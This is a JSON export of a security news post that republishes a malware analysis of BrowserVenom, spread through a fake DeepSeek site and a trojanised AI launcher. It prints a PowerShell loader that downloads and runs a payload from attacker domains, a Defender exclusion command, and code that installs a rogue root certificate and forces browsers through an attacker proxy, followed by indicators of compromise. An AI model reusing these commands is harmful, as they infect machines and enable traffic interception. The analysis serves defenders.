{"id":6666,"date":"2025-06-11T09:05:00","date_gmt":"2025-06-11T09:05:00","guid":{"rendered":"http:\/\/localhost\/?p=6666"},"modified":"2025-06-11T09:05:00","modified_gmt":"2025-06-11T09:05:00","slug":"toxic-trend-another-malware-threat-targets-deepseek","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6666","title":{"rendered":"Toxic trend: Another malware threat targets DeepSeek"},"content":{"rendered":"<h2>Security Update News<\/h2>\n<h3>Update Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Toxic trend: Another malware threat targets DeepSeek<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Update ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">SECURELIST:0E91CA67C55E1DAE3984B6A373FBA7F9<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">securelist<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-11T10:00:50<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Last Updated<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-11T10:00:50<\/td>\n<\/tr>\n<\/table>\n<h3>Security Impact<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">0.0<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #666666; font-weight: bold;\">NONE<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Attack Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\"><\/td>\n<\/tr>\n<\/table>\n<h3>Affected CVEs<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<\/ul>\n<\/div>\n<h3>Update Details<\/h3>\n<div style=\"; padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n![](https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2025\/06\/11094352\/browservenom-deepseek-featured-990&#215;400.jpg)<\/p>\n<p>## Introduction<\/p>\n<p>DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.<\/p>\n<p>But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install **BrowserVenom** , an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim&#8217;s network traffic and collect data.<\/p>\n<p>## Phishing lure<\/p>\n<p>The infection was launched from a phishing site, located at `https[:]\/\/deepseek-platform[.]com`. It was spread via malvertising, intentionally placed as the top result when a user searched for &#8220;deepseek r1&#8221;, thus taking advantage of the model&#8217;s popularity. Once the user reaches the site, a check is performed to identify the victim&#8217;s operating system. If the user is running Windows, they will be presented with only one active button, &#8220;Try now&#8221;. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.<\/p>\n<p>![Malicious website mimicking DeepSeek](https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2025\/06\/10104807\/browservenom-mimicks1.png)<\/p>\n<p>Malicious website mimicking DeepSeek<\/p>\n<p>Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the `proxy1.php` URL path with a &#8220;Download now&#8221; button. Clicking that results in downloading the malicious installer named `AI_Launcher_1.21.exe` from the following URL: `https:\/\/r1deepseek-ai[.]com\/gg\/cc\/AI_Launcher_1.21.exe`.<\/p>\n<p>We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites&#8217; functionality, which suggests that they are developed by Russian-speaking threat actors.<\/p>\n<p>## Malicious installer<\/p>\n<p>The malicious installer `AI_Launcher_1.21.exe` is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.<\/p>\n<p>![The second fake CAPTCHA](https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2025\/06\/10110326\/browservenom-mimicks2.png)<\/p>\n<p>The second fake CAPTCHA<\/p>\n<p>This is another fake CAPTCHA that is loaded from `https[:]\/\/casoredkff[.]pro\/captcha`. After the checkbox is ticked, the URL is appended with `\/success`, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.<\/p>\n<p>![Two options to install abused LLM frameworks](https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2025\/06\/10110438\/browservenom-mimicks3.png)<\/p>\n<p>Two options to install abused LLM frameworks<\/p>\n<p>Clicking either of the &#8220;Install&#8221; buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: `MLInstaller.Runner.Run()`. This function triggers the infectious part of the implant.<\/p>\n<p>    private async void lmBtn_Click(object sender, EventArgs e)<br \/>    {<br \/>    \ttry<br \/>    \t{<br \/>    \t\tMainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();<br \/>    \t\tthis.lmBtn.Text = &#8220;Downloading..&#8221;;<br \/>    \t\tthis.lmBtn.Enabled = false;<br \/>    \t\tAction action;<br \/>    \t\tif ((action = MainFrm.<>O.<0>__Run) == null)<br \/>    \t\t{<br \/>    \t\t\taction = (MainFrm.<>O.<0>__Run = new Action(Runner.Run));  # <--- malware initialization<br \/>    \t\t}<br \/>    \t\tTask.Run(action);<br \/>    \t\tCS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), &#8220;LM-Studio-0.3.9-6-x64.exe&#8221;);<br \/>    [&#8230;]<\/p>\n<p>When the `MLInstaller.Runner.Run()` function is executed in a separate thread on the machine, the infection develops in the following three steps:<\/p>\n<p>  1. First, the malicious function tries to exclude the user&#8217;s folder from Windows Defender&#8217;s protection by decrypting a buffer using the AES encryption algorithm.<\/p>\n<p>The AES encryption information is hardcoded in the implant:<\/p>\n<p>**Type** | AES-256-CBC  <br \/>&#8212;|&#8212;  <br \/>**Key** | 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20  <br \/>**IV** | 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10  <\/p>\n<p>The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.<\/p>\n<p>         powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE<\/p>\n<p>It should be noted that this command needs administrator privileges and will fail in case the user lacks them. <br \/>  2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as `%USERPROFILE%\\Music\\1.exe` under the user&#8217;s profile and then executed.<\/p>\n<p>         $ap = &#8220;\/api\/getFile?fn=lai.exe&#8221;;<br \/>         $b = $null;<br \/>         foreach($i in 0..1000000) {<br \/>             $s = if ($i &#8211; gt 0)  {<br \/>                 $i<br \/>             } else {<br \/>                 &#8220;&#8221;<br \/>             };<br \/>             $d = &#8220;https:\/\/app-updater$s.app$ap&#8221;;<br \/>             $b = (New &#8211; Object Net.WebClient).DownloadData($d);<br \/>             if ($b)  {<br \/>                 break<br \/>             }<\/p>\n<p>         };<br \/>         if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion()  &#8211; match&#8221;^v2&#8243;)  {<br \/>             [IO.File]::WriteAllBytes(&#8220;$env:USERPROFILE\\Music\\1.exe&#8221;, $b);<br \/>             Start &#8211; Process &#8220;$env:USERPROFILE\\Music\\1.exe&#8221;  &#8211; NoNewWindow<br \/>         } else {<br \/>             ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)<br \/>         }<\/p>\n<p>At the moment of our research, there was only one domain in existence: `app-updater1[.]app`. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section. <br \/>  3. Then the `MLInstaller.Runner.Run()` function locates a hardcoded stage two payload in the class and variable `ConfigFiles.load` of the malicious installer&#8217;s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run. <\/p>\n<p>## Loaded implant: BrowserVenom<\/p>\n<p>We dubbed the next-stage implant **BrowserVenom** because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim&#8217;s browsing activity while decrypting their traffic.<\/p>\n<p>First, BrowserVenom checks if the current user has administrator rights \u2013 exiting if not \u2013 and installs a hardcoded certificate created by the threat actor:<\/p>\n<p>    [&#8230;]<br \/>    \t\t\t\tX509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);<br \/>    \t\t\t\tif (RightsChecker.IsProcessRunningAsAdministrator())<br \/>    \t\t\t\t{<br \/>    \t\t\t\t\tStoreLocation storeLocation = StoreLocation.LocalMachine;<br \/>    \t\t\t\t\tX509Store x509Store = new X509Store(StoreName.Root, storeLocation);<br \/>    \t\t\t\t\tx509Store.Open(OpenFlags.ReadWrite);<br \/>    \t\t\t\t\tx509Store.Add(x509Certificate);<br \/>    [&#8230;]<\/p>\n<p>Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the `proxy-server` argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user&#8217;s profile preferences:<\/p>\n<p>    [&#8230;]<br \/>    \t\t\t\t\tnew ChromeModifier(new string[]<br \/>    \t\t\t\t\t{<br \/>    \t\t\t\t\t\t&#8220;chrome.exe&#8221;, &#8220;msedge.exe&#8221;, &#8220;opera.exe&#8221;, &#8220;brave.exe&#8221;, &#8220;vivaldi.exe&#8221;, &#8220;browser.exe&#8221;, &#8220;torch.exe&#8221;, &#8220;dragon.exe&#8221;, &#8220;iron.exe&#8221;, &#8220;epic.exe&#8221;,<br \/>    \t\t\t\t\t\t&#8220;blisk.exe&#8221;, &#8220;colibri.exe&#8221;, &#8220;centbrowser.exe&#8221;, &#8220;maxthon.exe&#8221;, &#8220;coccoc.exe&#8221;, &#8220;slimjet.exe&#8221;, &#8220;urbrowser.exe&#8221;, &#8220;kiwi.exe&#8221;<br \/>    \t\t\t\t\t}, string.Concat(new string[]<br \/>    \t\t\t\t\t{<br \/>    \t\t\t\t\t\t&#8220;&#8211;proxy-server=\\&#8221;&#8221;,<br \/>    \t\t\t\t\t\tProfileSettings.Host,<br \/>    \t\t\t\t\t\t&#8220;:&#8221;,<br \/>    \t\t\t\t\t\tProfileSettings.Port,<br \/>    \t\t\t\t\t\t&#8220;\\&#8221;&#8221;<br \/>    \t\t\t\t\t})).ProcessShortcuts();<br \/>    \t\t\t\t\tGeckoModifier.Modify();<br \/>    [&#8230;]<\/p>\n<p>The settings currently utilized by the malware are as follows:<\/p>\n<p>    public static readonly string Host = &#8220;141.105.130[.]106&#8221;;<br \/>    \tpublic static readonly string Port = &#8220;37121&#8221;;<br \/>    \tpublic static readonly string ID = &#8220;LauncherLM&#8221;;<br \/>    \tpublic static string HWID = ChromeModifier.RandomString(5);<\/p>\n<p>The variables `Host` and `Port` are the ones used as the proxy settings, and the `ID` and `HWID` are appended to the browser&#8217;s User-Agent, possibly as a way to keep track of the victim&#8217;s network traffic.<\/p>\n<p>## Conclusion<\/p>\n<p>As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors&#8217; use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.<\/p>\n<p>At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.<\/p>\n<p>To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.<\/p>\n<p>Kaspersky products detect this threat as `HEUR:Trojan.Win32.Generic` and `Trojan.Win32.SelfDel.iwcv`.<\/p>\n<p>## Indicators of Compromise<\/p>\n<p>### Hashes<\/p>\n<p>d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe  <br \/>dc08e0a005d64cc9e5b2fdd201f97fd6<\/p>\n<p>### Domains and IPs<\/p>\n<p>deepseek-platform[.]com | Main phishing site  <br \/>&#8212;|&#8212;  <br \/>r1deepseek-ai[.]com | Distribution server  <br \/>app-updater1[.]app | Stage #2 servers  <br \/>app-updater2[.]app  <br \/>app-updater[.]app  <br \/>141.105.130[.]106 | Malicious proxy\n<\/div>\n<p><a href=\"https:\/\/securelist.com\/browservenom-mimicks-deepseek-to-use-malicious-proxy\/115728\/\" target=\"_blank\" style=\"display: inline-block; color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Advisory Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Security Update News Update Information Title Toxic trend: Another malware threat targets DeepSeek Update ID SECURELIST:0E91CA67C55E1DAE3984B6A373FBA7F9 Type securelist Published 2025-06-11T10:00:50 Last Updated 2025-06-11T10:00:50 Security Impact&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,34,12,13,33,136,7,11,5],"class_list":["post-6666","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-news","tag-none","tag-securelist","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Toxic trend: Another malware threat targets DeepSeek - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6666\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Toxic trend: Another malware threat targets DeepSeek - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Security Update News Update Information Title Toxic trend: Another malware threat targets DeepSeek Update ID SECURELIST:0E91CA67C55E1DAE3984B6A373FBA7F9 Type securelist Published 2025-06-11T10:00:50 Last Updated 2025-06-11T10:00:50 Security Impact...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6666\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-11T09:05:00+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Toxic trend: Another malware threat targets DeepSeek\",\"datePublished\":\"2025-06-11T09:05:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666\"},\"wordCount\":660,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"news\",\"NONE\",\"securelist\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6666#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666\",\"name\":\"Toxic trend: Another malware threat targets DeepSeek - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-06-11T09:05:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6666\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6666#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Toxic trend: Another malware threat targets DeepSeek\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Toxic trend: Another malware threat targets DeepSeek - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6666","og_locale":"en_US","og_type":"article","og_title":"Toxic trend: Another malware threat targets DeepSeek - zero redgem","og_description":"Security Update News Update Information Title Toxic trend: Another malware threat targets DeepSeek Update ID SECURELIST:0E91CA67C55E1DAE3984B6A373FBA7F9 Type securelist Published 2025-06-11T10:00:50 Last Updated 2025-06-11T10:00:50 Security Impact...","og_url":"https:\/\/zero.redgem.net\/?p=6666","og_site_name":"zero redgem","article_published_time":"2025-06-11T09:05:00+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6666#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6666"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Toxic trend: Another malware threat targets DeepSeek","datePublished":"2025-06-11T09:05:00+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6666"},"wordCount":660,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","news","NONE","securelist","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6666#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6666","url":"https:\/\/zero.redgem.net\/?p=6666","name":"Toxic trend: Another malware threat targets DeepSeek - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-06-11T09:05:00+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6666#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6666"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6666#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Toxic trend: Another malware threat targets DeepSeek"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6666","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6666"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6666\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6666"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6666"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6666"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}